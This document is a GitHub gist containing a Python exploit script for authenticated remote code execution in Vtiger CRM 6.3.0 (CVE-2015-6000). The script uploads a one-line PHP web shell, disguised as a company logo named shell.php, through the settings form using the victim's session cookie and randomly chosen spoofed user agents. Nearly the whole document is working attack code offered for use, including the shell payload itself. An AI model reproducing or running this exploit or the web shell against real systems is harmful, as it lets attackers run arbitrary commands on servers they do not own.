Created
May 26, 2019 12:27
-
-
Save dorosch/629a4ee59f90ae6d11e0ed19e1b4a9d1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
""" | |
Vtiger CRM 6.3.0 - Authenticated Remote Code Execution | |
Version: 6.3.0 (and lower) | |
Tested on: Linux (Ubuntu) | |
CVE: CVE-2015-6000 | |
""" | |
from __future__ import print_function | |
import argparse | |
import sys | |
import io | |
import random | |
try: | |
import httplib | |
except ImportError: | |
import http.client as httplib | |
def payload(): | |
"""Standard single-line shell.""" | |
return '<? echo shell_exec($_GET[\'cmd\']); ?>' | |
def argument_parser(): | |
"""Parses command-line arguments.""" | |
parser = argparse.ArgumentParser() | |
parser.add_argument('--host', required=True, help='Target host') | |
parser.add_argument('--port', default=80, type=int, help='Target port') | |
parser.add_argument('--payload', default=payload(), help='Custom payload') | |
parser.add_argument('--cookie', required=True, help='Authorized cookies') | |
return parser.parse_args(sys.argv[1:]) | |
class UserAgent(object): | |
list = [ | |
'Opera/7.50 (Windows XP; U)', | |
'Opera/9.25 (Windows NT 6.0; U; en)', | |
'Opera/7.51 (Windows NT 5.1; U) [en]', | |
'Mozilla/4.8 [en] (Windows NT 6.0; U)', | |
'Mozilla/4.8 [en] (Windows NT 5.1; U)', | |
'Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)', | |
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)', | |
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', | |
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', | |
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/125.8', | |
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/85.8', | |
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)', | |
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0', | |
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) OmniWeb/v563.15' | |
] | |
class MultiPartForm(object): | |
""" | |
Accumulate the data to be used when posting a form. Original: | |
https://blog.thesparktree.com/the-unfortunately-long-story-dealing-with | |
""" | |
def __init__(self): | |
self.form_fields = [] | |
self.files = [] | |
self.boundary = '---------------------------51732462825208' | |
def get_content_type(self): | |
return 'multipart/form-data; boundary=%s' % self.boundary | |
def add_field(self, name, value): | |
self.form_fields.append((name, value)) | |
def add_file(self, fieldname, filename, content): | |
self.files.append((fieldname, filename, 'image/jpeg', content)) | |
def get_binary(self): | |
binary = io.BytesIO() | |
needsCLRF = False | |
# Add the form fields | |
for name, value in self.form_fields: | |
if needsCLRF: | |
binary.write('\r\n') | |
needsCLRF = True | |
block = [self.boundary, | |
'Content-Disposition: form-data; name="%s"' % name, | |
'', | |
value | |
] | |
binary.write('\r\n'.join(block)) | |
# Add the files to upload | |
for field_name, filename, content_type, body in self.files: | |
if needsCLRF: | |
binary.write('\r\n') | |
needsCLRF = True | |
block = [self.boundary, | |
str('Content-Disposition: file; name="%s"; filename="%s"' % \ | |
(field_name, filename)), | |
'Content-Type: %s' % content_type, | |
'' | |
] | |
binary.write('\r\n'.join(block)) | |
binary.write('\r\n') | |
binary.write(body) | |
# add closing boundary marker, | |
binary.write('\r\n--' + self.boundary + '--\r\n') | |
return binary | |
def exploit(): | |
args = argument_parser() | |
form = MultiPartForm() | |
form.add_field('__vtrftk', 'sid:c8c896d0d11ba83f6cde923ca4d74161a250d78d,1506431507') | |
form.add_field('module', 'Vtiger') | |
form.add_field('parent', 'Settings') | |
form.add_field('action', 'CompanyDetailsSave') | |
form.add_field('saveButton', '') | |
form.add_file('logo', 'shell.php', args.payload) | |
body = form.get_binary().getvalue() | |
headers = { | |
'User-Agent': random.choice(UserAgent.list), | |
'Content-Length': len(body), | |
'Cookie': args.cookie, | |
'Content-Type': form.get_content_type(), | |
} | |
connection = httplib.HTTPConnection(args.host, args.port) | |
connection.request('POST', '/index.php', body, headers) | |
response = connection.getresponse() | |
connection.close() | |
if response.status == 302: | |
print ('[+] exploit upload') | |
else: | |
print ('[-] exploit can\'t upload') | |
print (response.read()) | |
if __name__ == '__main__': | |
exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment